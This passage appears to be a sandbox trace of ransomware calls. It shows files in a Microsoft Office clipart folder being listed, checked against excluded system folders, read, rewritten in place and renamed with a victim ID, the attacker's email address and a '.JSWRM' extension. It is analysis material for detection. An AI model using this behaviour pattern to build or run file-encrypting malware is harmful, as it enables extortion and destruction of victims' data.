lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0094.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0094.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0094.472] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8118, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02738U.BMP", cAlternateFileName="")) returned 1 [0094.472] lstrcmpiW (lpString1="PH02738U.BMP", lpString2=".") returned 1 [0094.472] lstrcmpiW (lpString1="PH02738U.BMP", lpString2="..") returned 1 [0094.472] lstrcmpiW (lpString1="PH02738U.BMP", lpString2="...") returned 1 [0094.472] lstrcmpiW (lpString1="PH02738U.BMP", lpString2="windows") returned -1 [0094.472] lstrcmpiW (lpString1="PH02738U.BMP", lpString2="recovery") returned -1 [0094.472] lstrcmpiW (lpString1="PH02738U.BMP", lpString2="perflogs") returned 1 [0094.472] lstrcmpiW (lpString1="PH02738U.BMP", lpString2="documents and settings") returned 1 [0094.472] lstrcmpiW (lpString1="PH02738U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.472] lstrcmpiW (lpString1="PH02738U.BMP", lpString2="system volume information") returned -1 [0094.472] lstrcmpiW (lpString1="PH02738U.BMP", lpString2="msocache") returned 1 [0094.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0094.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02738U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02738U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02738U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0094.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0094.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02738U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02738U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02738U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0094.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0094.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0094.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0094.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02738U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02738u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.473] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33048) returned 1 [0094.473] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8110) returned 0x24d210 [0094.474] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8110, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8110, lpOverlapped=0x0) returned 1 [0094.483] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.483] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8110, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8110, lpOverlapped=0x0) returned 1 [0094.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.484] CloseHandle (hObject=0x314) returned 1 [0094.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0094.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0094.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0094.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0094.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0094.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0094.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.485] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02738U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02738u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02738U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02738u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0094.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0094.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0094.485] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1025500d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5f2b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02740G.GIF", cAlternateFileName="")) returned 1 [0094.485] lstrcmpiW (lpString1="PH02740G.GIF", lpString2=".") returned 1 [0094.486] lstrcmpiW (lpString1="PH02740G.GIF", lpString2="..") returned 1 [0094.486] lstrcmpiW (lpString1="PH02740G.GIF", lpString2="...") returned 1 [0094.486] lstrcmpiW (lpString1="PH02740G.GIF", lpString2="windows") returned -1 [0094.486] lstrcmpiW (lpString1="PH02740G.GIF", lpString2="recovery") returned -1 [0094.486] lstrcmpiW (lpString1="PH02740G.GIF", lpString2="perflogs") returned 1 [0094.486] lstrcmpiW (lpString1="PH02740G.GIF", lpString2="documents and settings") returned 1 [0094.486] lstrcmpiW (lpString1="PH02740G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0094.486] lstrcmpiW (lpString1="PH02740G.GIF", lpString2="system volume information") returned -1 [0094.486] lstrcmpiW (lpString1="PH02740G.GIF", lpString2="msocache") returned 1 [0094.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0094.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02740G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02740G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02740G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0094.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0094.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02740G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02740G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02740G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0094.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0094.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0094.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0094.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.487] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24363) returned 1 [0094.487] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f20) returned 0x24d210 [0094.488] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5f20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5f20, lpOverlapped=0x0) returned 1 [0094.494] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.494] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5f20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5f20, lpOverlapped=0x0) returned 1 [0094.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.494] CloseHandle (hObject=0x314) returned 1 [0094.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0094.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0094.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0094.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0094.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0094.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0094.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0094.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0094.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.494] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0094.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0094.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0094.495] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7f68, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02740U.BMP", cAlternateFileName="")) returned 1 [0094.495] lstrcmpiW (lpString1="PH02740U.BMP", lpString2=".") returned 1 [0094.495] lstrcmpiW (lpString1="PH02740U.BMP", lpString2="..") returned 1 [0094.495] lstrcmpiW (lpString1="PH02740U.BMP", lpString2="...") returned 1 [0094.495] lstrcmpiW (lpString1="PH02740U.BMP", lpString2="windows") returned -1 [0094.495] lstrcmpiW (lpString1="PH02740U.BMP", lpString2="recovery") returned -1 [0094.495] lstrcmpiW (lpString1="PH02740U.BMP", lpString2="perflogs") returned 1 [0094.496] lstrcmpiW (lpString1="PH02740U.BMP", lpString2="documents and settings") returned 1 [0094.496] lstrcmpiW (lpString1="PH02740U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.496] lstrcmpiW (lpString1="PH02740U.BMP", lpString2="system volume information") returned -1 [0094.496] lstrcmpiW (lpString1="PH02740U.BMP", lpString2="msocache") returned 1 [0094.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0094.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02740U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02740U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02740U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0094.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0094.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02740U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02740U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02740U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0094.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0094.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0094.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0094.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.496] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32616) returned 1 [0094.496] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7f60) returned 0x24d210 [0094.497] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7f60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7f60, lpOverlapped=0x0) returned 1 [0094.505] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.505] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7f60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7f60, lpOverlapped=0x0) returned 1 [0094.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.506] CloseHandle (hObject=0x314) returned 1 [0094.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0094.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0094.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0094.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0094.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0094.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0094.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0094.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0094.507] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02740U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02740u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0094.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0094.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0094.508] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50a5, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02742G.GIF", cAlternateFileName="")) returned 1 [0094.508] lstrcmpiW (lpString1="PH02742G.GIF", lpString2=".") returned 1 [0094.508] lstrcmpiW (lpString1="PH02742G.GIF", lpString2="..") returned 1 [0094.508] lstrcmpiW (lpString1="PH02742G.GIF", lpString2="...") returned 1 [0094.508] lstrcmpiW (lpString1="PH02742G.GIF", lpString2="windows") returned -1 [0094.508] lstrcmpiW (lpString1="PH02742G.GIF", lpString2="recovery") returned -1 [0094.508] lstrcmpiW (lpString1="PH02742G.GIF", lpString2="perflogs") returned 1 [0094.508] lstrcmpiW (lpString1="PH02742G.GIF", lpString2="documents and settings") returned 1 [0094.508] lstrcmpiW (lpString1="PH02742G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0094.508] lstrcmpiW (lpString1="PH02742G.GIF", lpString2="system volume information") returned -1 [0094.508] lstrcmpiW (lpString1="PH02742G.GIF", lpString2="msocache") returned 1 [0094.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0094.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 